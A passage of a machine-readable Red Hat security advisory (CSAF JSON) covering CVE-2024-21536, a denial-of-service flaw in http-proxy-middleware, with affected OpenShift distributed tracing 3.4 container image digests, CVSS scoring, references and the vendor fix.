"full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64 as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64 as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" } ] }, "vulnerabilities": [ { "cve": "CVE-2024-21536", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2024-10-19T06:00:36.846953+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2319884" } ], "notes": [ { "category": "description", "text": "A flaw was found in the http-proxy-middleware package. Affected versions of this package are vulnerable to denial of service (DoS) due to an UnhandledPromiseRejection error thrown by micromatch. This flaw allows an attacker to kill the Node.js process and crash the server by requesting certain paths.", "title": "Vulnerability description" }, { "category": "summary", "text": "http-proxy-middleware: Denial of Service", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2024-21536" }, { "category": "external", "summary": "RHBZ#2319884", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2319884" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2024-21536", "url": "https://www.cve.org/CVERecord?id=CVE-2024-21536" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-21536", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21536" }, { "category": "external", "summary": "https://gist.github.com/mhassan1/28be67266d82a53708ed59ce5dc3c94a", "url": "https://gist.github.com/mhassan1/28be67266d82a53708ed59ce5dc3c94a" }, { "category": "external", "summary": "https://github.com/chimurai/http-proxy-middleware/commit/0b4274e8cc9e9a2c5a06f35fbf456ccfcebc55a5", "url": "https://github.com/chimurai/http-proxy-middleware/commit/0b4274e8cc9e9a2c5a06f35fbf456ccfcebc55a5" }, { "category": "external", "summary": "https://github.com/chimurai/http-proxy-middleware/commit/788b21e4aff38332d6319557d4a5b1b13b1f9a22", "url": "https://github.com/chimurai/http-proxy-middleware/commit/788b21e4aff38332d6319557d4a5b1b13b1f9a22" }, { "category": "external", "summary": "https://security.snyk.io/vuln/SNYK-JS-HTTPPROXYMIDDLEWARE-8229906", "url": "https://security.snyk.io/vuln/SNYK-JS-HTTPPROXYMIDDLEWARE-8229906" } ], "release_date": "2024-10-19T05:00:04.056000+00:00", "remediations": [ { "category": "vendor_fix", "date": "2024-12-11T16:47:10+00:00", "details": "For details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/openshift_container_platform/4.17/h tml/operators/administrator-tasks#olm-upgrading-operators", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2024:10962" }, { "category": "workaround", "details": "Red Hat Product Security does not have any mitigation recommendations at this time.", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 